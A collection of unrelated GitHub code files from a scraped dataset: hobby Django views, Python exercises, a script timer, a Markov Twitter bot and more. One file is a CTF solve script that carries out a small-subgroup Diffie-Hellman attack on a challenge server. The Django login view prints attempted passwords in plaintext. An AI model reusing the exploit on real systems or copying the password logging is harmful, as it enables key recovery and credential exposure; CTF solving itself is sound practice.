fig.suptitle(f'Break Even Percentage: {(break_even_percent * 100):.2f}%\\nNumber of Bets: {num_bets * num_times_bets_repeated}')\n\n plt.show()\n\ndef american_to_percent (american):\n if american > 0:\n return 100 / (100 + american)\n else:\n return -american / (100 - american)\n\ndef simulate_bet_history(bets, sim_index, NUM_PLOTS, NUM_TIMES_SIM):\n bankroll = 0\n bankroll_history = []\n\n # if the random win probability is less than the clv, then the bet was a win\n for _ in range(NUM_TIMES_SIM):\n # for when need to track bankroll history for plotting\n if sim_index < NUM_PLOTS:\n for bet in bets.itertuples():\n random_win_prob = random.random()\n if random_win_prob < bet.clv:\n bankroll += bet.potential_payout \n bankroll -= bet.stake\n\n bankroll_history.append(bankroll)\n\n # for when only tracking bankroll at the end of each simulation 
is needed (faster)\n else:\n random_win_probs = np.random.rand(len(bets))\n win_mask = random_win_probs < bets['clv']\n\n # only add the payout if the bet was a win\n bankroll += (win_mask * (bets['potential_payout']) - bets['stake']).sum()\n\n sims_df_row = {'sim_index': sim_index, 'bankroll': bankroll, 'sim_bankroll_history': bankroll_history}\n\n return sims_df_row\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jakeflynn39/griffy-sharps","sub_path":"griffy_sharps.py","file_name":"griffy_sharps.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22691625400","text":"from django.shortcuts import get_object_or_404, render, Http404\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.urls import reverse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\n\nfrom .models import Question,User,Choice,VoteReason\nfrom .forms import UserForm, Questions, Choices, Questions1\nfrom django.contrib.admin.views.decorators import staff_member_required\n#@staff_member_required\n\n\n# Create your views here.\n\ndef index(request):\n # from Question set class find all categories and make a distinguish according to status.\n question_list1 = Question.objects.filter(status=Question.Status_Draft)\n question_list2 = Question.objects.filter(status=Question.Status_Voting)\n question_list3 = Question.objects.filter(status=Question.Status_End)\n question_list4 = Question.objects.filter(status=Question.Status_Deleted)\n\n context = {\n 'question_list1': question_list1,\n 'question_list2': question_list2,\n 'question_list3': question_list3,\n 'question_list4': question_list4,\n }\n \n return render(request,'first_app/index.html', context)\n\ndef question_status_modify(request, question_id):\n question = Question.objects.get(pk=question_id)\n vote_reason_list = VoteReason.objects.all()\n if request.method == \"POST\":\n print(question)\n # Fetch list of items to delete, by ID\n items_to_delete = request.POST.getlist('delete_items')\n print(request.POST)\n print(items_to_delete)\n # Delete those items all in one go\n choice_to_delete = Choice.objects.filter(pk__in=items_to_delete)\n choice_to_delete.delete()\n\n question_form = Questions(request.POST,instance=question,initial={'question': question})\n \n if question_form.is_valid():\n question_form.save()\n # messages.success(request,_('success!'))\n messages.success(request, ' Question updated.')\n \n print(question_form.cleaned_data)\n # return render(request,'first_app/index1.html', {'question':question})\n else:\n # the form was invalid if this else gets called.\n print(question_form.errors)\n else: \n question_form = Questions(instance=question,initial={'question': question})\n # choice_form = Choices() \n return render(request,'first_app/question_status_modify.html',\n {'question_form':question_form, 'question': question,'vote_reason_list': vote_reason_list})\n \n # if question.status == 0:\n # if request.method == 'POST':\n # question.question_text = request.POST.get('question_text')\n # question.status = request.POST.get('status')\n # question.save()\n # question = Question.objects.get(pk=question_id)\n\n # choice = Choice()\n # choice.question = question\n # choice.voter = request.user\n # choice.choice_text = request.POST.get('choice_text')\n # choice.save()\n\n # # Fetch list of items to delete, by ID\n # items_to_delete 
= request.POST.getlist('delete_items')\n # # Delete those items all in one go\n # # Choice.objects.filter(pk__in=items_to_delete).delete()\n # choice_to_delete = Choice.objects.filter(pk__in=items_to_delete)\n # choice_to_delete.delete()\n \n # print(question.status)\n # # if choice_to_delete is None:\n # # print(1)\n # # else:\n # # print(2)\n\n # else:\n # render(request,'first_app/index.html',)\n \n \n # return HttpResponse('Error')\n # choice = Choice()\n # question.question = request.POST['choice_text']\n\n\n\ndef question_modify_interval(request,choice_id):\n choice = Choice.objects.get(pk=choice_id)\n voter = request.user\n # selected_choice = question.choice_in_question.get(pk=request.POST['choice'])\n # choice_text = Choice.objects.filter(question=question)\n if request.method == \"POST\":\n choice_form = Choices(data = request.POST,instance=choice,initial={'choice': choice})\n \n if choice_form.is_valid():\n choice_form.save()\n \n print(choice_form.cleaned_data)\n question_list1 = Question.objects.filter(status=Question.Status_Draft)\n question_list2 = Question.objects.filter(status=Question.Status_Voting)\n question_list3 = Question.objects.filter(status=Question.Status_End)\n question_list4 = Question.objects.filter(status=Question.Status_Deleted)\n\n context = {\n 'question_list1': question_list1,\n 'question_list2': question_list2,\n 'question_list3': question_list3,\n 'question_list4': question_list4,\n }\n \n return render(request,'first_app/index.html', context)\n else:\n # the form was invalid if this else gets called.\n print(choice_form.errors)\n else: \n choice_form = Choices(instance=choice, initial={'choice': choice}) \n return render(request,'first_app/question_modify_interval.html',\n {'choice_form':choice_form, 'choice_text':choice})\n\ndef detail(request, question_id):\n question = Question.objects.get(pk=question_id)\n \n if request.method == \"POST\":\n print(question)\n question_form = Questions1(request.POST,instance=question,initial={'question': question})\n \n if question_form.is_valid():\n question_form.save()\n \n print(question_form.cleaned_data)\n # return render(request,'first_app/index1.html', {'question':question})\n else:\n # the form was invalid if this else gets called.\n print(question_form.errors)\n else: \n question_form = Questions1(instance=question,initial={'question': question})\n # choice_form = Choices() \n return render(request,'first_app/detail.html',\n {'question_form':question_form, 'question': question})\n \n # try:\n # question = Question.objects.get(pk=question_id)\n # except Question.DoesNotExist:\n # raise Http404(\"Question does not exist\") \n # return render(request, 'first_app/detail.html', {'question': question})\n\ndef detail1(request, question_id):\n question = Question.objects.get(pk=question_id)\n return render(request,'first_app/detail1.html',\n {'question': question})\n\ndef detail3(request, question_id):\n question = Question.objects.get(pk=question_id)\n print(question)\n return render(request,'first_app/detail3.html',\n {'question': question})\n\ndef results(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'polls/results.html', {'question': question})\n\n\n@login_required\ndef vote(request, question_id): \n question = Question.objects.get(pk=question_id)\n # choice = get_object_or_404(Choice, pk=choice_id)\n user = request.user\n # reason0 = VoteReason.objects.filter(choice=choice, voter=user)\n # print(reason0)\n # if reason0 is None:\n #if 
Vote.objects.filter(question=question,voter=request.user).exists():\n #if UserProfileInfo.objects.filter(user=request.user).exists() and Choice.objects.filter(question=question).exists():\n\n if request.method == \"POST\": \n \n reason = VoteReason()\n reason.choice = question.choice_in_question.get(pk=request.POST['choice'])\n reason.voter = user\n\n reason_text = request.POST.get('reason') \n reason.reason = reason_text\n reason.save()\n try:\n selected_choice = question.choice_in_question.get(pk=request.POST['choice'])\n except (KeyError, Choice.DoesNotExist):\n return render(request, 'first_app/detail.html', {\n 'question': question,\n 'error_message': \"You didn't select a choice.\",\n })\n else:\n selected_choice.votes += 1\n selected_choice.voter = user\n selected_choice.save()\n \n # return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))\n # return render(request, 'first_app/index.html',)\n return HttpResponse('Voted successfully')\n \ndef register(request):\n registered = False\n if request.method == \"POST\":\n print(request.POST)\n user_form = UserForm(data=request.POST)\n # print(user_form)\n if user_form.is_valid():\n user=user_form.save()\n user.set_password(user.password)\n print(user_form.cleaned_data)\n registered = True\n # print(user_form.username)\n \n # print(user_form.password)\n else:\n # the form was invalid if this else gets called.\n print(user_form.errors)\n else: \n user_form = UserForm()\n return render(request,'first_app/registration.html',\n {'user_form':user_form,\n 'registered':registered})\n \n\ndef user_login(request):\n if request.method =='POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(username=username,password=password)\n if user:\n if user.is_active:\n login(request,user)\n return HttpResponseRedirect(reverse('index'))\n else:\n return HttpResponse(\"Account not active\")\n else:\n print(\"Someone try to login and failed, which means the authentication not pass\")\n print(\"Username{},password{}\".format(username,password))\n return HttpResponse(\"invalid login details supplied\")\n else:\n return render(request,'first_app/login.html',{})\n\n@login_required\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect(reverse('index'))\n\ndef state_draft(request, question_id):\n if question.status == 0:\n pass","repo_name":"XiaoyuZhao1996-byte/Django","sub_path":"quiz/first_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30088482532","text":"import pwn\nimport Crypto.Util.number as cun\nimport Crypto.Random.random as crr\nimport Crypto.Util.Padding as cup\nfrom Crypto.Cipher import AES\nimport hashlib\n\n\ndef subgroup_attack(ct, p, g):\n x = g\n while x != 1:\n shared_key = x\n aes_key = hashlib.sha1(cun.long_to_bytes(shared_key)).digest()[:16]\n cipher = AES.new(aes_key, AES.MODE_ECB)\n try:\n pt = cup.unpad(cipher.decrypt(ct), 16)\n if b\"My favorite food is \" in pt:\n return pt\n except:\n pass\n\n x = (x * g) % p\n\n\n# io = pwn.process(\"python3 ../dist/server.py\", shell=True)\n# io = pwn.remote(\"localhost\", 4000)\nio = pwn.remote(\"35.224.135.84\", 4000)\n\n# Mersenne prime: https://www.mersenne.org/primes\np = (1 << 2203) - 1\n\n# Prime factor of (p - 1) from factordb:\n# http://factordb.com/index.php?query=2%5E2203+-+2\nq = 
711718443060888357455104383759579899185453159253854240850359788937324328008225366876777905349283339583535597500393178373807851032788989008946432082299780350922963303\n\nio.sendlineafter(\"Please help them choose p: \", str(p))\nio.sendlineafter(\"give me a large prime factor of (p - 1): \", str(q))\n\nio.recvuntil(\"Here's their encrypted message: \")\nct = bytes.fromhex(io.recvlineS())\n\npt = subgroup_attack(ct, p, g=8)\nio.sendlineafter(\"Decrypt it and I'll give you the flag: \", pt)\nio.interactive()\n","repo_name":"qxxxb/ctf_challenges","sub_path":"2021/ccc/crypto/poison_prime/solve/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"16484033494","text":"# Description\n # A good game needs a good interface. \n # In this stage, you will make your output user-friendly.\n\n # The player should be able to see the domino snake, the so-called playing field, and their own pieces. \n # It's a good idea to enumerate these pieces because throughout the game the player will be selecting them to make a move.\n\n # Two things must remain hidden from the player: \n # the stock pieces and the computer's pieces. \n # The player should not be able to see them, only the number of pieces remaining.\n\n# Objectives\n # Print the header using seventy equal sign characters (=).\n# print('='*70)\n # Print the number of dominoes remaining in the stock – Stock size: [number].\n# print(f'Stock size: [{len(stock_pieces)}]')\n # Print the number of dominoes the computer has – Computer pieces: [number].\n# print(f'Computer pieces: [{len(computer_pieces)}]')\n # Print the domino snake. At this stage, it consists of the only starting piece.\n# print(domino_pieces)\n # Print the player's pieces, Your pieces:, and then one piece per line, enumerated.\n# for piece in player_pieces:\n# print(piece)\n# Print the status of the game:\n# print(f'Status: {status}')\n # If status = \"computer\", print \"Status: Computer is about to make a move. Press Enter to continue...\"\n# if status == 'computer':\n# print('Computer is about to make a move. Press Enter to continue...')\n# status = 'player'\n # If status = \"player\", print \"Status: It's your turn to make a move. Enter your command.\"\n# if status == 'player':\n# print('It's your turn to make a move. Enter your command')\n# status = 'computer'\n # Note that both these statuses suppose that the next move will be made, but at this stage, the program should stop here. We will implement other statuses (like \"win\", \"lose\", and \"draw\") in the stages to come.\n\nfrom Creation import *\nfrom Functions import interface, display_turns\npieces = create_shuffled_pieces()\nstock_pieces, computer_pieces, player_pieces, domino_pieces, status = distribute_pieces(pieces)\ninterface(stock_pieces, computer_pieces, player_pieces, domino_pieces)\n\nprint(f'\\nStatus:', end= ' ')\n# If status = \"computer\", print \"Status: Computer is about to make a move. Press Enter to continue...\"\nif status == 'computer':\n print('Computer is about to make a move. Press Enter to continue...')\n # status = 'player'\n# If status = \"player\", print \"Status: It's your turn to make a move. Enter your command.\"\nelif status == 'player':\n print(\"It's your turn to make a move. 
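The subgroup attack in solve.py above terminates quickly because of the choice g = 8. A self-contained check of the group order, assuming only the Mersenne prime p from the script: since p = 2**2203 - 1, we have 2**2203 = p + 1, so 2 has multiplicative order 2203 (a prime) modulo p, and 8 = 2**3 shares that order because gcd(3, 2203) = 1. The loop therefore tries at most 2203 candidate AES keys.

p = (1 << 2203) - 1
assert pow(2, 2203, p) == 1   # p + 1 = 2**2203, so 2**2203 == 1 (mod p)
assert pow(8, 2203, p) == 1   # g = 8 lies in the same subgroup of prime order 2203
# Hence x = g, g*g, ... in subgroup_attack() cycles back to 1 within 2203 steps.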
Enter your command\")\n # status = 'computer'","repo_name":"devThinKoki/learning_repo","sub_path":"JetBrains_Academy/Python_Development_Course/Easy_Dominoes/02_The-Interface.py","file_name":"02_The-Interface.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15947913806","text":"from math import log10\n\n\ndef is_prime(n):\n if n < 2: return False\n if n == 2: return True\n if n % 2 == 0: return False\n \n i = 3\n while i*i <= n:\n if n % i == 0:\n return False\n i += 2\n\n return True\n\n\ndef func(n, _len, rem_id):\n if _len == 1:\n return\n\n n = (n-n%(10**rem_id))//10 + n%(10**(rem_id-1))\n\n if is_prime(n):\n res.add(n)\n for i in range(1, _len+1):\n func(n, _len-1, i)\n\n\nn = int(input())\n_len = int(log10(n)) + 1\nres = set()\nfor i in range(1, _len):\n func(n, _len-1, i)\n\nfor e in res:\n print(e)\n","repo_name":"proman3419/AGH-WIET-INF-WDI-2020","sub_path":"6/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29428450637","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app01', '0077_auto_20180621_1713'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='carousel',\n name='newlink',\n field=models.URLField(verbose_name='轮播推荐文章链接', blank=True, null=True),\n ),\n migrations.AlterField(\n model_name='carousel',\n name='webpurl',\n field=models.URLField(verbose_name='web图片链接地址', blank=True, null=True),\n ),\n ]\n","repo_name":"wangyc666666/WoBanN","sub_path":"app01/migrations/0078_auto_20180621_1721.py","file_name":"0078_auto_20180621_1721.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16017880704","text":"import colorama\n\nfrom . import get, show, utils\nfrom .config import CONFIG\n\n__author__ = \"Yohan Min\"\n__version__ = \"3.4.2\"\n\n\ndef show_aops_data(\n code,\n stalk_users=None,\n find_posts=None,\n search_method=None,\n find_text=None,\n **kwargs\n):\n \"\"\"Show data extracted from AoPS on the terminal.\n\n It is recommended to only extract an AoPS topic with 1000 or less posts, due\n to the time limit of the Selenium script execution.\n\n Args:\n code (str): Code of the AoPS category or topic. It will be automatically\n determined if the code belongs to a category or a topic.\n stalk_users (set of str): Users to stalk in this topic. If a user we\n want to stalk posted or liked a post from this topic, we will be\n notified.\n find_posts (list of int): Post numbers to find in this topic.\n search_method (list of str): Strings to be searched in this category. 
It\n            will guide us to find a sequence of subcategories and subfolders\n            containing those texts.\n        find_text (str): Text to find in the items from this category.\n    \"\"\"\n    for arg, value in kwargs.items():\n        CONFIG[arg] = value\n\n    if \"write_files\" in CONFIG and CONFIG[\"write_files\"]:\n        CONFIG[\"write_html\"] = CONFIG[\"write_json\"] = True\n\n    colorama.init()\n\n    if \"h\" in code:\n        json_file = \"topic-data.json\"\n        data, begin_time = get.get_topic_data(code)\n\n        if CONFIG[\"write_html\"] or CONFIG[\"write_json\"]:\n            utils.create_path(data[\"category_id\"], data[\"topic_id\"])\n\n        show.show_topic_data(data, stalk_users, find_posts)\n\n    else:\n        json_file = \"category-data.json\"\n        data, begin_time = get.get_category_data(code, search_method)\n\n        if CONFIG[\"write_html\"] or CONFIG[\"write_json\"]:\n            utils.create_path(data[\"category_id\"])\n\n        show.show_category_data(data, find_text)\n\n    if CONFIG[\"write_json\"]:\n        utils.write_json_file(data, json_file)\n\n    utils.print_elapsed_time(begin_time)\n","repo_name":"myh2910/aops-tools","sub_path":"aops_tools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}{"seq_id":"74287446246","text":"# Print students in ascending order of grade\n\nn = int(input())\narr = []\n\nfor _ in range(n):\n    data = input().split()\n    arr.append((data[0], int(data[1])))\n\narr = sorted(arr, key=lambda x: x[1])\n\nfor i in range(len(arr)):\n    print(arr[i][0], end=' ')","repo_name":"bluvory/Python_for_coding_test","sub_path":"ch06/6-11.py","file_name":"6-11.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
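The grade sort in 6-11.py above can equivalently use operator.itemgetter in place of key=lambda x: x[1]; a small sketch with sample data of my own:

from operator import itemgetter

records = [('hong', 95), ('lee', 77), ('kim', 83)]
for name, _ in sorted(records, key=itemgetter(1)):
    print(name, end=' ')   # prints: lee kim hong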
{"seq_id":"20306130817","text":"# Import plotting packages\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport numpy as np\n# Import external classes\nimport graphBase as gb\nimport dectobase as db\n\n# Print user prompt\nprint(\"\\nWould you like to:\")\nprint(\"1. Graph the number of digits it takes to represent decimal number 'n' in base 2-36\")\nprint(\"2. Graph the number of digits it takes to represent decimal 1-100000 in base 'n'\")\n\n# Take user input\nwhile(1):\n    try:\n        print(\"Choice: \",end=\"\")\n        userChoice = int(input())\n        if(userChoice!=1 and userChoice!=2):\n            raise\n        break\n\n    except:\n        print(\"Invalid input, please try again\")\n        \n        \n# Graph varying bases\nif(userChoice == 1):\n\n    # Take user input\n    while(1):\n        try:\n            print(\"Enter the value you would like to plot: \",end=\"\")\n            userValue = int(input())\n            break\n        except:\n            print(\"Invalid input, please try again\")\n    \n    # Generate list of representations in base 2-36\n    arr = db.dectobase(userValue)\n    # Generate list of lengths of representations\n    lengths = [len(i) for i in arr[0]]\n    # X values for plotting (bases 2-36)\n    xvals = [i+2 for i in range(len(lengths))]\n\n    # Generate plot\n    plt.step(xvals,lengths)\n    plt.plot(xvals,lengths, 'o--', color='grey', alpha = 0.3)\n    plt.ylabel(\"Number of digits\")\n    plt.xlabel(\"Base\")\n    plt.title(\"Number of digits to represent \"+str(userValue)+\" in base 2-36\")\n    plt.show()\n\n# Graph varying numbers\nelif(userChoice == 2):\n\n    # Take user input\n    while(1):\n        try:\n            print(\"Enter the base you would like to plot: \",end=\"\")\n            userValue = int(input())\n            if(userValue<2 or userValue>36):\n                raise\n            break\n        except:\n            print(\"Invalid input, please try again\")\n    \n    \n    # Generate input values for graphbase function\n    inpvals = [(i*i) for i in range(1,100000)]\n    arr = gb.graphBase(userValue, inpvals)\n\n    # Generate plot\n    fig,ax = plt.subplots()\n    ax.set_xscale('log')\n    ax.plot(inpvals, arr[0], '-', color='black')\n    plt.ylabel(\"Number of digits\")\n    plt.xlabel(\"Value\")\n    plt.title(\"Number of digits to represent 1-1x10^10 in base \"+str(userValue))\n    plt.show()\n","repo_name":"ziptol/discretefinal","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
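The digit counts that main.py above derives from string representations can also be computed arithmetically: a number n >= 1 needs floor(log_base(n)) + 1 digits. A sketch (floating-point rounding near exact powers of the base deserves care):

import math

def digit_count(n, base):
    # Number of digits of n when written in the given base, for n >= 1.
    return math.floor(math.log(n) / math.log(base)) + 1

assert digit_count(255, 2) == 8    # 11111111
assert digit_count(255, 16) == 2   # FF
assert digit_count(99999, 10) == 5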
{"seq_id":"6916241495","text":"name = input(\"- What's your name?\\n- \")\n\nprint(\"Hello\", name)\n\nyear = input('Enter your year of birth\\n- ')\n\nage = 2022 - int(year)\n\nif age < 12:\n    print(\"Going to the children's section\")\n\nelif age < 18:\n    print(\"Going to the teen section\")\n\nelse:\n    print(\"Going to the main section\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n# try:\n#     year = int(year)\n# except:\n#     print(\"Invalid input\")\n#     quit()\n\n# age = 2022 - year\n# print(age)\n\n# if age < 12:\n#     print(\"You're under 12. Going to the children's section...\")\n\n# else:\n#     print(\"Going to the teen section...\")\n\n\n\n\n\n\n\n# Given two integers a and b. Find and print the larger of them.\n\n# a, b = 5, 10\n\n# if (a > b):\n#     print(a)\n# elif (a < b):\n#     print(b)\n# else:\n#     print('The numbers are equal')\n\n\n# Given three integers a, b and c. Find and print the count of negative numbers.\n\n# a, b, c = -1, 3, -3\n\n\n# n = 0\n\n# if a < 0:\n#     n = n + 1\n# if b < 0:\n#     n = n + 1\n# if c < 0:\n#     n = n + 1\n\n# print(\"Count of negative numbers:\", n)\n\n\n# Given an integer a. If it is even, print 1; otherwise print 0.\n\n# a = 101;\n\n# if a % 2 == 0:\n#     print(1)\n# else: print(0)\n","repo_name":"aleksmn/PythonLessons","sub_path":"l-05.py","file_name":"l-05.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"33437424927","text":"#!/usr/bin/env python3.6\n\"\"\"Record statistics on execution time of a folder full of executables.\"\"\"\nfrom timeit import timeit\nfrom subprocess import run, PIPE, CompletedProcess\nfrom typing import Optional, Dict, List\nfrom json import loads, dumps\nfrom os import listdir, access\nfrom os.path import basename, join\nfrom os import X_OK as as_executable_file\nfrom strict_hint import strict\nfrom logging import getLogger, DEBUG\nfrom logging.config import dictConfig\n\n\nclass TimeCommands:\n    \"\"\"TimeCommands in a specified folder.\"\"\"\n\n    @strict\n    def __init__(self,\n                 parent_dir: str,\n                 iterations: int = 1000,\n                 rate_limited: List[str] = []\n                 ):\n        \"\"\"The main entrypoint of the script.\"\"\"\n        # Logging config and initialization.\n        dictConfig({\n            \"version\": 1,\n            \"formatters\": {\n                \"brief\": {\n                    'format':\n                        \"%(levelname)s [%(asctime)s] %(filename)s@%(lineno)s:\"\n                        + \" %(message)s\"\n                },\n                \"friendly\": {\n                    'format':\n                        \"In %(filename)s, at line %(lineno)s, a message was\"\n                        + \" logged. Message follows:\\n\\t%(message)s\\nThis\"\n                        + \" message was logged by the function %(funcName)s,\"\n                        + \" with\\n%(levelname)s(%(levelno)s) severity,\"\n                        + \" at %(asctime)s.\"\n                }\n            },\n            \"handlers\": {\n                \"testhandler\": {\n                    \"class\": \"logging.StreamHandler\",\n                    \"formatter\": \"brief\",\n                    \"level\": DEBUG\n                }\n            },\n            \"root\": {\n                \"handlers\": [\"testhandler\"],\n                \"level\": DEBUG\n            }\n        })\n        self.log = getLogger()\n        self.parent_dir = parent_dir\n        self.iterations = iterations\n        self.rate_limited_commands = rate_limited\n        self.rate_limited_iterations = 3\n        self.times = self.get_existing_stats()\n        self.baseline('before')\n        self.time_all()\n        self.baseline('after')\n        self.write_results()\n\n    def write_results(self):\n        \"\"\"Write the results of the tests to stats.json for later review.\"\"\"\n        with open('stats.json', mode='w') as stats:\n            stats.write(dumps(self.times, indent=2) + '\\n')\n\n    @strict\n    def baseline(self, prefix: str):\n        \"\"\"A baseline amount of time running any command will take.\"\"\"\n        if f'baseline {prefix}' in self.times.keys():\n            self.times[f'baseline {prefix}'].append(self.timecmd(\"true\"))\n        else:\n            self.times[f'baseline {prefix}'] = [self.timecmd(\"true\")]\n\n    @strict\n    def add_new_time_for(self, command: str, time: float):\n        \"\"\"Check for the command in the times dict and append time to it.\"\"\"\n        self.log.info(f\"Storing time {time} for command {command}.\")\n        if command in self.times.keys():\n            self.times[command].append(time)\n        else:\n            self.times[command] = [time]\n\n    def time_all(self):\n        \"\"\"Run timecmd() on each command in self.parent_dir.\"\"\"\n        for fn in listdir(self.parent_dir):\n            self.log.debug(f\"Checking file {fn}...\")\n            if access(join(self.parent_dir, fn), as_executable_file):\n                self.log.info(\n                    f\"...{fn} is executable\\nTiming command {fn}.\"\n                )\n                if fn == \"iface\":\n                    self.add_new_time_for(\n                        'iface',\n                        self.timecmd(\n                            \"BLOCK_INSTANCE=enp4s9 \"\n                            + join(self.parent_dir, fn)\n                        )\n                    )\n                # NOTE: Any scripts which require params or envvars should\n                # intercept here\n                elif fn in self.rate_limited_commands:\n                    self.add_new_time_for(\n                        fn,\n                        self.timecmd(\n                            join(self.parent_dir, fn),\n                            
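# Side note on the __init__ signature above: rate_limited: List[str] = [] is a
# mutable default argument, evaluated once at function definition time. It is
# only read here, so it is harmless, but the conventional idiom (a sketch of
# mine, not from this script) uses a None sentinel:
#
#     def __init__(self, parent_dir, iterations=1000, rate_limited=None):
#         self.rate_limited_commands = rate_limited if rate_limited is not None else []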
self.rate_limited_iterations\n )\n )\n else:\n self.add_new_time_for(\n fn, self.timecmd(join(self.parent_dir, fn))\n )\n else:\n self.log.info(f\"...{fn} is not executable. Skipping.\")\n\n @strict\n def timecmd(self, cmd: str, number_of_exec: int = 0) -> float:\n \"\"\"Create a function for a shell command and time it.\"\"\"\n def cmd2():\n self.runcmd(cmd)\n if not number_of_exec:\n number_of_exec = self.iterations\n return timeit(cmd2, number=number_of_exec) / number_of_exec\n\n @staticmethod\n @strict\n def runcmd(cmd: str, to_stdin: Optional[str] = None) -> CompletedProcess:\n \"\"\"Run a command with default settings.\"\"\"\n return run(cmd, shell=True, check=True, stdout=PIPE, input=to_stdin)\n\n @strict\n def get_existing_stats(self) -> Dict[str, List[float]]:\n \"\"\"Retrieve any existing statistics from stats.json.\"\"\"\n try:\n with open(\"stats.json\") as stats:\n return loads(stats.read())\n except FileNotFoundError:\n return {fn: [] for fn in listdir(self.parent_dir)}\n\n\nclass TimeI3BlocksScripts(TimeCommands):\n \"\"\"Time the scripts stored at /home/scott/.i3/blocks/.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize stuff specific to this folder, then pass to super.\"\"\"\n parent_dir = \"/home/scott/.i3/blocks\"\n super().__init__(parent_dir=parent_dir, rate_limited=[\n 'public_ip',\n 'weather'\n ])\n\n\nTimeI3BlocksScripts()\n","repo_name":"dscottboggs/time_scripts","sub_path":"time_scripts.py","file_name":"time_scripts.py","file_ext":"py","file_size_in_byte":5777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34055032789","text":"\nimport markovify\nimport tweepy\nimport os\n\nfrom random import randint\nfrom time import sleep\n\n\n\noldtext = []\nback = []\nbacktext = []\n\nclass TwitterAPI:\n def __init__(self, botfood):\n self.load_botfood(botfood)\n\n consumer_key = os.environ.get(\"consumer_key1\")\n consumer_secret = os.environ.get(\"consumer_secret1\")\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n access_token = os.environ.get(\"access_token1\")\n access_token_secret = os.environ.get(\"access_token_secret1\")\n auth.set_access_token(access_token, access_token_secret)\n self.api = tweepy.API(auth)\n\n def load_botfood(self, botfood):\n with open (botfood) as botfood:\n botfood = botfood.read()\n self.model = markovify.Text(botfood)\n print(self.model)\n\n def backlog(self):\n public_tweets = self.api.home_timeline()\n for tweet in public_tweets:\n if tweet.user.screen_name != \"tmrdrr\":\n backtext.insert(0, tweet.text)\n if tweet.user.screen_name not in back:\n toReply = tweet.user.screen_name\n self.tweet(toReply)\n back.insert(0, tweet.user.screen_name)\n\n def follow(self):\n for follower in tweepy.Cursor(self.api.followers).items():\n follower.follow()\n print (follower.screen_name)\n\n\n\n def timeline(self):\n public_tweets = self.api.home_timeline()\n with open (\"botfood.txt\", \"r\") as botfood_file:\n botfood = botfood_file.read()\n model = markovify.Text(botfood)\n # print(public_tweets)\n with open (\"botfood.txt\", \"a\") as botfood_file:\n for tweet in public_tweets:\n if tweet.user.screen_name != \"tmrdrr\":\n if tweet.text not in oldtext:\n if tweet.text not in backtext:\n if \"tmrdrr\" in tweet.text.lower():\n toReply = tweet.user.screen_name\n self.tweet(toReply)\n oldtext.insert(0, tweet.text)\n tobeinserted = tweet.text\n tobeinserted = tobeinserted.split(' ', 1)[1]\n botfood_file.write(tobeinserted + \"\\n\")\n\n # print(oldtext)\n if len(oldtext) > 15:\n 
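The core pattern of time_scripts.py above, timing a shell command by wrapping subprocess.run in timeit, also works without the class machinery; a minimal sketch of the same idea:

from timeit import timeit
from subprocess import run, PIPE

n = 100
avg = timeit(lambda: run('true', shell=True, check=True, stdout=PIPE), number=n) / n
print(f'average wall time per run: {avg:.6f} s')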
oldtext.pop()\n\n # def search(self):\n # message = self.model.make_short_sentence(120)\n # for tweet in self.api.search(q=\"tmrdrr\"):\n # if \"tmrdrr\" in tweet.text.lower():\n # toReply = tweet.user.screen_name\n # self.tweet(toReply)\n\n\n\n\n\n def tweet(self, toReply):\n message = self.model.make_short_sentence(120)\n messageTwo = self.model.make_short_sentence(140)\n self.api.update_status(\"@\" + toReply + \" \" + message)\n self.api.update_status(messageTwo)\n\n\n\n\n\n def automate(self, delay):\n while True:\n self.timeline()\n\n sleep(delay)\n\n\ndef main():\n twitter = TwitterAPI(\"botfood.txt\")\n twitter.backlog()\n twitter.follow()\n twitter.automate(185)\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tmrdr/mrdrbotsite","sub_path":"mrdrbot.py","file_name":"mrdrbot.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28562851721","text":"from extract import extract_csv\nimport pandas as pd\n\npd.options.display.max_columns = None\n\ndef transform_data():\n \"\"\" This function transforms and cleans the Dataframe data 